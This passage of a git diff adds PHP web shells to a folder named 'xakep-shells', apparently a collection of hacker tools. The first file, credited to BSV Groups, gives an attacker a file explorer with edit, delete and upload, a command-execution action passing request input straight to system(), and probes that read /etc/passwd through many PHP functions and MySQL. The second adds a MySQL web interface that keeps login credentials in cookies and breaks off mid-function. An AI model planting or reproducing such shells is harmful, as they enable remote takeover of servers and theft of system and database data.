+
+      echo "<td align=\"left\"";
+      if ($fileInfo->perms[7] == "w") echo " bgcolor=".COLOR_PUBLIC;
+      if ($fileInfo->perms[6] == "-") echo " bgcolor=".COLOR_PRIVATE;
+      echo ">";
+
+      if ($fileInfo->isLink) {
+         echo $fileInfo->name." -> ";
+         $fileInfo->fullname = $fileInfo->linkTo;
+         $fileInfo->name = $fileInfo->linkTo;
+      }
+
+      if ($fileInfo->isDir) {
+         echo "<b><a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname\" ";
+         echo ">$fileInfo->name</a></b>";
+      }
+      else echo $fileInfo->name;
+
+      echo "</td>";
+      echo "<td>$fileInfo->size</td>";
+      echo "<td>$fileInfo->lastmod</td>";
+      echo "<td>$fileInfo->perms</td>";
+      echo "<td>";
+                           
+      if (!$fileInfo->isDir) {
+         if ($fileInfo->perms[6] == 'r') {
+            echo "<a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname&do=view\"> <font color=yellow>V</font></a>";
+            echo " <a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname&do=download\"><font color=yellow>D</font></a>";
+         }
+         if ($fileInfo->perms[7] == 'w') {
+            echo " <a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname&do=edit\"><font color=yellow>E</font></a>";
+            echo " <a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname&do=delete\"><font color=yellow>X</font></a>";
+         }
+      }
+      echo "</tr>";
+   };
+
+   //************************************************************************
+   //* Decides which function use to show a file
+   //************************************************************************
+
+   function viewFile($file) {
+      global $associations, $fileInfo;
+      $fileInfo->getInfo($file);
+      if (!$associations[$fileInfo->extension]
+          || $associations[$fileInfo->extension]["function"] == "") showFile($file);
+      else $associations[$fileInfo->extension]["function"]($file);
+   };
+
+   function showFile($file, $editing = 0) {
+      global $PHP_SELF, $dir;
+      $handlerFile = fopen($file, "r") or die("ERROR opening file $file");
+
+      if ($editing) echo "<h3><b>Edit file $file</b></h3><hr>";
+      else echo "<h3><b>File $file</b></h3><hr>";
+
+      echo "<form";
+      if ($editing)
+         echo " action=\"$PHP_SELF?action=explorer&do=save&dir=$file\" method=\"post\"";
+      echo ">";
+
+      $buffer = fread($handlerFile, filesize($file));
+      $buffer = str_replace("&", "&amp;", $buffer);
+      $buffer = str_replace("<", "&lt;", $buffer);
+      $buffer = str_replace(">", "&gt;", $buffer);
+
+      echo "<center><textarea wrap=\"off\" cols=\"90\" rows=\"20\" name=\"text\">$buffer</textarea></center>";
+      if ($editing) echo "<p><input type=\"submit\" name=\"Submit\" value=\"Save changes\"></p>\n</form>";
+      echo "</form>";
+      fclose($handlerFile);
+   };
+
+   //************************************************************************
+   //* Saves a changed file
+   //************************************************************************
+
+   function saveFile($file) {
+      global $dir, $text;
+      $handlerFile = fopen($file, "w") or die("ERROR: Could not open file ".basename($file)." for writing");
+      $text = stripslashes($text);
+      fwrite($handlerFile, $text, strlen($text)) or die("Error writing to file.");
+      fclose($handlerFile);
+      echo "Changes has been saved in ".basename($file)."<hr>";
+      $dir = dirname($file);
+   };
+
+
+   function uploadFile() {
+      global $HTTP_POST_FILES, $dir;
+      copy($HTTP_POST_FILES["userfile"][tmp_name],
+            $dir."/".$HTTP_POST_FILES["userfile"][name])
+      or die("Error uploading file".$HTTP_POST_FILES["userfile"][name]);
+
+      echo "File ".$HTTP_POST_FILES["userfile"][name]." succesfully uploaded.";
+      unlink($userfile);
+   };
+
+   //************************************************************************
+   //* Deletes a file, asking for confirmation first
+   //* (This function hasn't been fully tested)
+   //************************************************************************
+
+   function deleteFile($file) {
+      global $confirm;
+      if ($confirm != TRUE) die("<a href=\"$PHP_SELF?action=explorer&dir=$file&do=delete&confirm=1\">Confirm deletion of $file</a>");
+      else {
+         if (!unlink($file)) return FALSE;
+         return TRUE;
+      }
+   };
+
+
+   function viewFileHeader($file, $header) {
+      header($header);
+      readfile($file);
+   };
+
+
+   function viewGIF($file) {
+      viewFileHeader($file, "Content-type: image/gif");
+   };
+
+   function viewJPEG($file) {
+      viewFileHeader($file, "Content-type: image/jpeg");
+   };
+
+   switch ($do) {
+      case "phpinfo":
+         phpinfo();
+         die();
+      case "view":
+          viewFile($dir);
+          break;
+      case "edit":
+          showFile($dir, 1);
+          break;
+      case "download":
+         viewFileHeader($dir, "Content-type: unknown");
+         break;
+      case "delete":
+         if (!deleteFile($dir)) echo "Could not delete file $dir<br>";
+         else echo "File $dir deleted succesfully<br>";
+         $dir = dirname($dir);
+         showDirectory($dir);
+         break;
+      case "exec":
+         echo "<pre>\n";
+         echo system($dir);
+         echo "\n</pre>";
+         exit();
+      case "upload":
+         uploadFile();
+         showDirectory($dir);
+         break;
+      case "save":
+          saveFile($dir);
+      default:
+         showDirectory($dir);
+         break;
+   };
+
+   if ($do != "view" && $do != "download") {
+?>
+<p>
+   <table border="0">
+   <tr><? if ((fileperms($dir) & 00002)){
+?>
+   <td>
+      <form enctype="multipart/form-data" action="<? print "$PHP_SELF?action=explorer&dir=$dir&do=upload"; ?>" method=post>
+         <input type="hidden" name="MAX_FILE_SIZE" value="1000000">
+         <input name="userfile" type="file">
+         <input type="submit" value="Upload file">
+      </form>
+   </td>
+<? } ?>
+   </tr>
+   </table>
+<p>
+</p>
+</body>
+</html>
+<? }
+}
+    //--------------------------------------------------- END EXPLORER
+
+
+if (!$action) {
+?><p align="right"><font size=2><a href="<?=$PHP_SELF?>?action=misc&do=phpinfo">phpinfo</a></font></p><?
+echo "<pre>";
+        if ($mysql_use!="no") {
+        $phpcheck = new php_check_silent($mhost, $muser, $mpass, $mdb);
+        } else { $phpcheck = new php_check_silent(); }
+echo "</pre>";
+
+?><br><br>
+
+<font size=2><a href="<?=$PHP_SELF?>?action=check">Security Check</a></font> <font color="green" size=2>[executable] </font>
+
+<br>
+
+<!-- system check -->
+<?
+//echo $phpcheck->cmd_state;
+//echo $phpcheck->cmd_method;
+if ($phpcheck->cmd_method) { $cmd_method = $phpcheck->cmd_method; } else { $cmd_method = "system"; } ?>
+<font size=2><a href="<?=$PHP_SELF?>?action=cmd&method=<?=$cmd_method?>">Exec commands by PHP</a></font>
+<?
+if ($phpcheck->cmd_method) {
+echo "<font color=\"green\" size=2>[executable] ";  } else { echo "<font color=\"red\" size=2>[not executable]";  }
+
+?></font>
+
+<br>
+
+<!-- system check -->
+<?
+//echo $phpcheck->cmd_state;
+//echo $phpcheck->cmd_method;
+?>
+<font size=2><a href="<?=$PHP_SELF?>?action=cmdbrowse">Exec browse by PHP</a></font>
+<?
+if ($phpcheck->cmd_method) {
+echo "<font color=\"green\" size=2>[executable] ";  } else { echo "<font color=\"red\" size=2>[not executable]";  }
+
+?></font>
+
+<br>
+
+<!-- read check -->
+<? if ($phpcheck->read_method) { $read_method = $phpcheck->read_method; } else { $read_method = "file"; } ?>
+<font size=2><a href="<?=$PHP_SELF?>?action=read&method=<?=$read_method?>">Read by PHP</a></font>
+<?
+if ($phpcheck->read_method) {
+echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"red\" size=2>[not executable]"; }
+?></font>
+
+<br>
+
+<!-- browse check -->
+<?
+//echo $phpcheck->browse_state;
+if ($phpcheck->browse_state=="yes") { $path= "/"; } else { $path = getcwd(); } ?>
+<font size=2><a href="<?=$PHP_SELF?>?action=browse&dir=<?=$path?>">Browse by PHP</a></font>
+<?
+if ($phpcheck->browse_state=="yes") {
+echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"yellow\" size=2>[limited executable]"; }
+?></font>
+
+<br>
+<?
+//echo $phpcheck->browse_state;
+if ($phpcheck->browse_state=="yes") { $path= "/"; } else { $path = getcwd(); } ?>
+<font size=2><a href="<?=$PHP_SELF?>?action=explorer&dir=<?=$path?>">File Explorer by PHP</a></font>
+<?
+if ($phpcheck->browse_state=="yes") {
+echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"yellow\" size=2>[limited executable]"; }
+?></font>
+
+<br>
+
+
+<!-- mysql check -->
+<font size=2><a href="<?=$PHP_SELF?>?action=mysqlread&file=/etc/passwd">Read by MySQL</a></font>
+<?
+    if ($phpcheck->mysql_state=="ok") {
+    echo "<font color=\"green\" size=2>[executable] "; }
+    if ($phpcheck->mysql_state=="fail") {
+    echo "<font color=\"red\" size=2>[not executable] "; }
+    if ($phpcheck->mysql_state=="pass") {
+    echo "<font color=\"yellow\" size=2>[not executable] ";
+    ?></font> <font size=1>[you didnt configure this]</font><font>
+    <?
+    } ?></font><?
+}
+?>
+</body>
+</html>
+<?
+
+// PHP security check objects by dodo
+
+
+    class php_check
+    {
+
+        function php_check($host="notset", $user="", $pass="", $db="") {
+            if ($host!="notset") {
+            $this->mysql_do = "yes";
+            $this->mysql_host = $host;
+            $this->mysql_user = $user;
+            $this->mysql_pass = $pass;
+            $this->mysql_db = $db;
+            } else { $this->mysql_do = "no"; }
+
+        $this->mainstate = "safe";
+
+        echo "<b>checking system functions:</b>\n";
+        if ($this->system_checks("/bin/ls")) { $this->output_mainstate(1, "system checks"); } else { $this->output_mainstate(0, "system checks"); }
+        echo "<b>checking reading functions:</b>\n";
+        if ($this->reading_checks()) { $this->output_mainstate(1, "reading checks"); } else { $this->output_mainstate(0, "reading checks"); }
+        echo "<b>checking misc filesystem functions:</b>\n";
+        if ($this->miscfile_checks()) { $this->output_mainstate(1, "misc filesystem checks"); } else { $this->output_mainstate(0, "misc filesystem checks"); }
+        echo "<b>checking mysql functions:</b>\n";
+            $stater = $this->mysql_checks();
+            if ($stater==2) { $this->output_mainstate(2, "mysql checks"); }
+            if ($stater==1) { $this->output_mainstate(1, "mysql checks"); }
+            if ($stater==0) { $this->output_mainstate(0, "mysql checks"); }
+        if ($this->mainstate=="safe") { echo "\n\n\nPHP check returned: <font color=green>NOT VULNERABLE</font>\n"; } else { echo "\n\n\nPHP check returned: <font color=red>VULNERABLE</font>\n"; }
+        }
+
+
+        function output_state($state = 0, $name = "function") {
+            if ($state==0) {
+            echo "$name\t\tfailed\n";
+            }
+            if ($state==1) {
+            echo "$name\t\t<font color=red>OK</font>\n";
+            }
+            if ($state==2) {
+            echo "$name\t\t<font color=yellow>OK</font>\n";
+            }
+            if ($state==3) {
+            echo "$name\t\t<font color=yellow>skipped</font>\n";
+            }
+        }
+
+        function output_mainstate($state = 0, $name = "functions") {
+            if ($state==1) {
+            echo "\n$name returned: <font color=red>VULNERABLE</font>\n\n";
+            $this->mainstate = "unsafe";
+            }
+            if ($state==0) {
+            echo "\n$name returned: <font color=green>OK</font>\n\n";
+            $this->mainstate = "unsafe";
+            }
+            if ($state==2) {
+            echo "\n$name returned: <font color=yellow>SKIPPED</font>\n\n";
+            }
+        }
+
+        function system_checks($cmd = "/bin/ls") {
+        if ($pp = popen($cmd, "r")) {
+            if (fread($pp, 2096)) {
+            $this->output_state(1, "popen     ");
+            $sys = true;
+            } else {
+            $this->output_state(0, "popen     ");
+            }
+        } else { $this->output_state(0, "popen     "); }
+        if (@exec($cmd)) { $this->output_state(1, "exec     "); $sys = true; $this->cmd_method = "exec"; } else { $this->output_state(0, "exec     "); }
+        if (@shell_exec($cmd)) { $this->output_state(1, "shell_exec"); $sys = true; $this->cmd_method = "shel_exec"; } else { $this->output_state(0, "shell_exec"); }
+        echo "<!-- \n";
+        if (@system($cmd)) { echo " -->"; $this->output_state(1, "system   "); $ss = true; $sys = true; $this->cmd_method = "system"; } else { echo " -->"; $this->output_state(0, "system   "); }
+        echo "<!-- \n";
+        if (@passthru($cmd)) { echo " -->"; $this->output_state(1, "passthru"); $sys = true; $this->cmd_method = "passthru"; } else { echo " -->"; $this->output_state(0, "passthru"); }
+        //if ($output = `$cmd`)) { $this->output_state(1, "backtick"); $sys = true; } else { $this->output_state(0, "backtick"); }
+        if ($sys) { return 1; $this->cmd_state = "yes"; } else { return ; }
+        }
+
+        function reading_checks($file = "/etc/passwd") {
+            if (@function_exists("require_once")) {
+            echo "<!--";
+            if (@require_once($file)) { echo "-->"; $this->output_state(1, "require_once"); $sys = true; } else { echo "-->"; $this->output_state(0, "require_once"); }
+            }
+            if (@function_exists("require")) {
+            echo "<!--";
+            if (@require($file)) { echo "-->"; $this->output_state(1, "require    "); $sys = true; } else { echo "-->"; $this->output_state(0, "require    "); }
+            }
+            if (@function_exists("include")) {
+            echo "<!--";
+            if (@include($file)) { echo "-->"; $this->output_state(1, "include   "); $sys = true; } else { echo "-->"; $this->output_state(0, "include   "); }
+            }
+            //if (@function_exists("highlight_file")) {
+            echo "<!--";
+            if (@highlight_file($file)) { echo "-->"; $this->output_state(1, "highlight_file"); $sys = true; } else { echo "-->"; $this->output_state(0, "highlight_file"); }
+            //}
+            //if (@function_exists("virtual")) {
+            echo "<!--";
+            if (@virtual($file)) { echo "-->"; $this->output_state(1, "virtual   "); $sys = true; } else { echo "-->"; $this->output_state(0, "virtual  "); }
+            //}
+            if (@function_exists("file_get_contents")) {
+            if (@file_get_contents($file)) { $this->output_state(1, "filegetcontents"); $sys = true; } else { $this->output_state(0, "filegetcontents"); }
+            } else {
+            $this->output_state(0, "filegetcontents");
+            }
+        echo "<!-- ";
+        if (@show_source($file)) { echo " -->"; $this->output_state(1, "show_source"); $this->read_method = "show_source"; $sys = true; } else { echo " -->"; $this->output_state(0, "show_source"); }
+        echo "<!-- ";
+        if (@readfile($file)) { echo " -->"; $this->output_state(1, "readfile"); $this->read_method = "readfile"; $sys = true; } else { echo " -->"; $this->output_state(0, "readfile"); }
+        if (@fopen($file, "r")) { $this->output_state(1, "fopen   "); $this->read_method = "fopen"; $sys = true; } else { $this->output_state(0, "fopen   "); }
+        if (@file($file)) { $this->output_state(1, "file     "); $this->read_method = "file"; $sys = true; } else { $this->output_state(0, "file     "); }
+        if ($sys) { return 1; } else { return ; }
+        }
+
+        function miscfile_checks() {
+        $currentdir = @getcwd();
+        $scriptpath = $_SERVER["PATH_TRANSLATED"];
+        if (@opendir($currentdir)) {
+            $this->output_state(2, "opendir \$cwd");
+                $dp = @opendir("$currentdir");
+                $files="";
+                $this->browse_state = "lim";
+                while($file = @readdir($dp)) { $files .= $file; }
+                if (@strstr($files, '.')) {  $this->output_state(2, "readdir \$cwd"); $this->browse_state = "lim"; } else { $this->output_state(0, "readdir \$cwd"); }
+
+            } else { $this->output_state(0, "opendir \$cwd"); }
+        if (@opendir("/")) {
+            $this->output_state(1, "opendir /");
+            $sys = true;
+                $dp = @opendir("/");
+                $this->browse_state = "yes";
+                $files="";
+                while($file = @readdir($dp)) { $files .= $file; }
+                if (@strstr($files, '.')) {  $this->output_state(1, "readdir /"); $this->browse_state = "yes"; } else { $this->output_state(0, "readdir /"); }
+            } else { $this->output_state(0, "opendir /"); }
+        if (@mkdir("$currentdir/test", 0777)) { $this->output_state(1, "mkdir   "); $sys = true; } else { $this->output_state(0, "mkdir   "); }
+        if (@rmdir("$currentdir/test")) { $this->output_state(1, "rmdir     "); $sys = true; } else { $this->output_state(0, "rmdir     "); }
+        if (@copy($scriptpath, "$currentdir/copytest")) {
+            $this->output_state(2, "copy    ");
+            $sys = true;
+                if (@unlink("$currentdir/copytest")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+            } else {
+            $this->output_state(0, "copy    ");
+        }
+        if (@copy($scriptpath, "/tmp/copytest")) {
+            $this->output_state(2, "copy2/tmp");
+            //$sys = true;
+                if (!$del) {
+                if (@unlink("tmp/copytest")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "copy2/tmp");
+        }
+        if (@link("/", "$currentdir/link2root")) {
+                $this->output_state(1, "link      ");
+                $sys = true;
+                if (!$del) {
+                if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "link      ");
+        }
+        if (@symlink("/", "$currentdir/link2root")) {
+                $this->output_state(1, "symlink   ");
+                $sys = true;
+                if (!$del) {
+                if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "symlink   ");
+        }
+        if ($sys) { return 1; } else { return ; }
+        }
+
+        function mysql_checks() {
+            if ($this->mysql_do=="yes") {
+                if (@mysql_pconnect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
+                $this->output_state(1, "mysql_pconnect"); $mstate = 1;
+                } else { $this->output_state(0, "mysql_pconnect"); $mstate = 0; }
+            } else { $this->output_state(3, "mysql_pconnect"); $mstate = 2; }
+            if ($this->mysql_do=="yes") {
+                if (@mysql_connect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
+                $this->output_state(1, "mysql_connect"); $mstate = 1;
+                } else { $this->output_state(0, "mysql_connect"); $mstate = 0; }
+            } else { $this->output_state(3, "mysql_connect"); $mstate = 2; }
+            if ($this->mysql_state=="fail") {
+            echo "\n\n<!-- MYSQL ERROR:\n".mysql_error()."\n-->\n\n";
+            echo "<script> alert(\"you have a mysql error:\\n ".mysql_error()."\\n\\nbecause of this the mysql exploiting will be off\"); </script>";
+            }
+            return $mstate;
+        }
+    }
+
+    class php_check_silent
+    {
+
+        function php_check_silent($host="notset", $username="", $pass="", $db="") {
+            if ($host!="notset") {
+            $this->mysql_do = "yes";
+            $this->mysql_host = $host;
+            $this->mysql_user = $username;
+            $this->mysql_pass = $pass;
+            $this->mysql_db = $db;
+            } else { $this->mysql_do = "no"; }
+
+        $this->mainstate = "safe";
+
+        if ($this->system_checks("/bin/ls")) { $this->output_mainstate(1, "system checks"); } else { $this->output_mainstate(0, "system checks"); }
+        if ($this->reading_checks()) { $this->output_mainstate(1, "reading checks"); } else { $this->output_mainstate(0, "reading checks"); }
+        if ($this->miscfile_checks()) { $this->output_mainstate(1, "misc filesystem checks"); } else { $this->output_mainstate(0, "misc filesystem checks"); }
+        $this->mysql_checks();
+        }
+
+
+        function output_state($state = 0, $name = "function") {
+            if ($state==0) {
+            //echo "$name\t\tfailed\n";
+            }
+            if ($state==1) {
+            //echo "$name\t\t<font color=red>OK</font>\n";
+            }
+            if ($state==2) {
+            //echo "$name\t\t<font color=yellow>OK</font>\n";
+            }
+        }
+        function output_mainstate($state = 0, $name = "functions") {
+            if ($state==1) {
+            //echo "\n$name returned: <font color=red>VULNERABLE</font>\n\n";
+            $this->mainstate = "unsafe";
+            } else {
+            //echo "\n$name returned: <font color=green>OK</font>\n\n";
+            }
+        }
+
+        function system_checks($cmd = "/bin/ls") {
+        if ($pp = popen($cmd, "r")) {
+            if (fread($pp, 2096)) {
+            $this->output_state(1, "popen     ");
+            $sys = true;
+            } else {
+            $this->output_state(0, "popen     ");
+            }
+        } else { $this->output_state(0, "popen     "); }
+        if (@exec($cmd)) { $this->output_state(1, "exec     "); $sys = true; $this->cmd_method = "exec"; } else { $this->output_state(0, "exec     "); }
+        if (@shell_exec($cmd)) { $this->output_state(1, "shell_exec"); $sys = true; $this->cmd_method = "shel_exec"; } else { $this->output_state(0, "shell_exec"); }
+        echo "<!-- ";
+        if (@passthru($cmd)) { echo " -->"; $this->output_state(1, "passthru"); $sys = true; $this->cmd_method = "passthru"; } else { echo " -->"; $this->output_state(0, "passthru"); }
+        echo "<!-- ";
+        if (@system($cmd)) { echo " -->"; $this->output_state(1, "system   "); $sys = true; $this->cmd_method = "system"; } else { echo " -->"; $this->output_state(0, "system   "); }
+        //if ($output = `$cmd`)) { $this->output_state(1, "backtick"); $sys = true; } else { $this->output_state(0, "backtick"); }
+        if ($sys) { return 1; $this->cmd_state = "yes"; } else { return ; }
+        }
+
+        function reading_checks($file = "/etc/passwd") {
+            if (@function_exists("require_once")) {
+            if (@require_once($file)) { $this->output_state(1, "require_once"); $sys = true; } else { $this->output_state(0, "require_once"); }
+            }
+            if (@function_exists("require")) {
+            if (@require($file)) { $this->output_state(1, "require"); $sys = true; } else { $this->output_state(0, "require"); }
+            }
+            if (@function_exists("include")) {
+            if (@include($file)) { $this->output_state(1, "include "); $sys = true; } else { $this->output_state(0, "include "); }
+            }
+            if (@function_exists("file_get_contents")) {
+            if (@file_get_contents($file)) { $this->output_state(1, "filegetcontents"); $sys = true; } else { $this->output_state(0, "filegetcontents"); }
+            } else {
+            $this->output_state(0, "filegetcontents");
+            }
+        echo "<!-- ";
+        if (@show_source($file)) { echo " -->"; $this->output_state(1, "show_source"); $this->read_method = "show_source"; $sys = true; } else { echo " -->"; $this->output_state(0, "show_source"); }
+        echo "<!-- ";
+        if (@readfile($file)) { echo " -->"; $this->output_state(1, "readfile"); $this->read_method = "readfile"; $sys = true; } else { echo " -->"; $this->output_state(0, "readfile"); }
+        if (@fopen($file, "r")) { $this->output_state(1, "fopen   "); $this->read_method = "fopen"; $sys = true; } else { $this->output_state(0, "fopen   "); }
+        if (@file($file)) { $this->output_state(1, "file     "); $this->read_method = "file"; $sys = true; } else { $this->output_state(0, "file     "); }
+        if ($sys) { return 1; } else { return ; }
+        }
+
+        function miscfile_checks() {
+        $currentdir = @getcwd();
+        $scriptpath = $_SERVER["PATH_TRANSLATED"];
+        if (@opendir($currentdir)) {
+            $this->output_state(2, "opendir \$cwd");
+                $dp = @opendir("$currentdir");
+                $files="";
+                $this->browse_state = "lim";
+                while($file = @readdir($dp)) { $files .= $file; }
+                if (@strstr($files, '.')) {  $this->output_state(2, "readdir \$cwd"); $this->browse_state = "lim"; } else { $this->output_state(0, "readdir \$cwd"); }
+
+            } else { $this->output_state(0, "opendir \$cwd"); }
+        if (@opendir("/")) {
+            $this->output_state(1, "opendir /");
+            $sys = true;
+                $dp = @opendir("/");
+                $this->browse_state = "yes";
+                $files="";
+                while($file = @readdir($dp)) { $files .= $file; }
+                if (@strstr($files, '.')) {  $this->output_state(1, "readdir /"); $this->browse_state = "yes"; } else { $this->output_state(0, "readdir /"); }
+            } else { $this->output_state(0, "opendir /"); }
+        if (@mkdir("$currentdir/test", 0777)) { $this->output_state(1, "mkdir   "); $sys = true; } else { $this->output_state(0, "mkdir   "); }
+        if (@rmdir("$currentdir/test")) { $this->output_state(1, "rmdir     "); $sys = true; } else { $this->output_state(0, "rmdir     "); }
+        if (@copy($scriptpath, "$currentdir/copytest")) {
+            $this->output_state(2, "copy    ");
+            $sys = true;
+                if (@unlink("$currentdir/copytest")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+            } else {
+            $this->output_state(0, "copy    ");
+        }
+        if (@copy($scriptpath, "/tmp/copytest")) {
+            $this->output_state(2, "copy2/tmp");
+            //$sys = true;
+                if (!$del) {
+                if (@unlink("tmp/copytest")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "copy2/tmp");
+        }
+        if (@link("/", "$currentdir/link2root")) {
+                $this->output_state(1, "link      ");
+                $sys = true;
+                if (!$del) {
+                if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "link      ");
+        }
+        if (@symlink("/", "$currentdir/link2root")) {
+                $this->output_state(1, "symlink   ");
+                $sys = true;
+                if (!$del) {
+                if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "symlink   ");
+        }
+        if ($sys) { return 1; } else { return ; }
+        }
+        function mysql_checks() {
+            if ($this->mysql_do=="yes") {
+                if (@mysql_pconnect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
+                $this->output_state(1, "mysql_pconnect"); $mstate = 1; $this->mysql_state = "ok";
+                } else { $this->output_state(0, "mysql_pconnect"); $mstate = 0; $this->mysql_state = "fail"; }
+            } else { $this->output_state(3, "mysql_pconnect"); $mstate = 2; $this->mysql_state = "pass"; }
+            if ($this->mysql_do=="yes") {
+                if (@mysql_connect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
+                $this->output_state(1, "mysql_connect"); $mstate = 1; $this->mysql_state = "ok";
+                } else { $this->output_state(0, "mysql_connect"); $mstate = 0; $this->mysql_state = "fail"; }
+            } else { $this->output_state(3, "mysql_connect"); $mstate = 2; $this->mysql_state = "pass"; }
+            if ($this->mysql_state=="fail") {
+            echo "<!-- MYSQL ERROR:\n".mysql_error()."\n-->";
+            echo "<script> alert(\"you have a mysql error:\\n ".mysql_error()."\\n\\nbecause of this the mysql exploiting will be off\"); </script>";
+            }
+            return $mstate;
+        }
+    }
+
+
+
+// the end :]
+?>
+<center>Copyright © 2003 <a href="http://www.bansacviet.net">BSV Groups</a>
+<br>PHP Shell Support by <a href="mailto:admin@bansacviet.net">DTN</a> 
\ No newline at end of file
diff --git a/xakep-shells/PHP/mysql_shell.php.txt b/xakep-shells/PHP/mysql_shell.php.txt
new file mode 100644
index 0000000..13cd5c8
--- /dev/null
+++ b/xakep-shells/PHP/mysql_shell.php.txt
@@ -0,0 +1,1169 @@
+<?
+/*
+ * MySQL Web Interface Version 0.8
+ * -------------------------------
+ * Developed By SooMin Kim (smkim@popeye.snu.ac.kr)
+ * License : GNU Public License (GPL)
+ * Homepage : http://popeye.snu.ac.kr/~smkim/mysql
+ */
+
+$HOSTNAME = "localhost";
+
+function logon() {
+	global $PHP_SELF;
+
+	setcookie( "mysql_web_admin_username" );
+	setcookie( "mysql_web_admin_password" );
+	echo "<html>\n";
+	echo "<head>\n";
+	echo "<title>MySQL Web Interface</title>\n";
+	echo "</head>\n";
+	echo "<body>\n";
+	echo "<table width=100% height=100%><tr><td><center>\n";
+	echo "<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n";
+	echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
+	echo "<h1>MySQL Web Interface</h1>\n";
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=logon_submit>\n";
+	echo "<table cellpadding=5 cellspacing=1>\n";
+	echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>\n";
+	echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>\n";
+	echo "</table><p>\n";
+	echo "<input type=submit value='Enter'>\n";
+	echo "<input type=reset value='Clear'><br>\n";
+	echo "</form>\n";
+	echo "</center></td></tr></table>\n";
+	echo "</center></td></tr></table>\n";
+	echo "<p><hr width=300>\n";
+	echo "<font size=2>\n";
+	echo "Copyleft &copy; since 1999,\n";
+	echo "<a href='mailto:smkim76@icqmail.com'>SooMin Kim</a><br>\n";
+	echo "<a href='http://popeye.snu.ac.kr/~smkim/mysql'>Hompage<a> is available<br>";
+	echo "</font>\n";
+	echo "</center></td></tr></table>\n";
+	echo "</body>\n";
+	echo "</html>\n";
+}
+
+function logon_submit() {
+	global $username, $password, $PHP_SELF;
+
+	setcookie( "mysql_web_admin_username", $username );
+	setcookie( "mysql_web_admin_password", $password );
+	echo "<html>";
+	echo "<head>";
+	echo "<META HTTP-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=listDBs'>";
+	echo "</head>";
+	echo "</html>";
+}
+
+function echoQueryResult() {
+	global $queryStr, $errMsg;
+
+	if( $errMsg == "" ) $errMsg = "Success";
+	if( $queryStr != "" ) {
+		echo "<table cellpadding=5>\n";
+		echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
+		echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
+		echo "</table><p>\n";
+	}
+}
+
+function listDatabases() {
+	global $mysqlHandle, $PHP_SELF;
+
+	echo "<h1>Database List</h1>\n";
+
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=createDB>\n";
+	echo "<input type=text name=dbname>\n";
+	echo "<input type=submit value='Create Database'>\n";
+	echo "</form>\n";
+	echo "<hr>\n";
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+
+	$pDB = mysql_list_dbs( $mysqlHandle );
+	$num = mysql_num_rows( $pDB );
+	for( $i = 0; $i < $num; $i++ ) {
+		$dbname = mysql_dbname( $pDB, $i );
+		echo "<tr>\n";
+		echo "<td>$dbname</td>\n";
+		echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Table</a></td>\n";
+		echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
+		echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname'>Dump</a></td>\n";
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+}
+
+function createDatabase() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	mysql_create_db( $dbname, $mysqlHandle );
+	listDatabases();
+}
+
+function dropDatabase() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	mysql_drop_db( $dbname, $mysqlHandle );
+	listDatabases();
+}
+
+function listTables() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	echo "<h1>Table List</h1>\n";
+	echo "<p class=location>$dbname</p>\n";
+	echoQueryResult();
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=createTable>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=text name=tablename>\n";
+	echo "<input type=submit value='Create Table'>\n";
+	echo "</form>\n";
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=query>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=text size=40 name=queryStr>\n";
+	//echo "<textarea cols=30 rows=3 name=queryStr></textarea><br>";
+	echo "<input type=submit value='Query'>\n";
+	echo "</form>\n";
+	echo "<hr>\n";
+
+	$pTable = mysql_list_tables( $dbname );
+
+	if( $pTable == 0 ) {
+		$msg  = mysql_error();
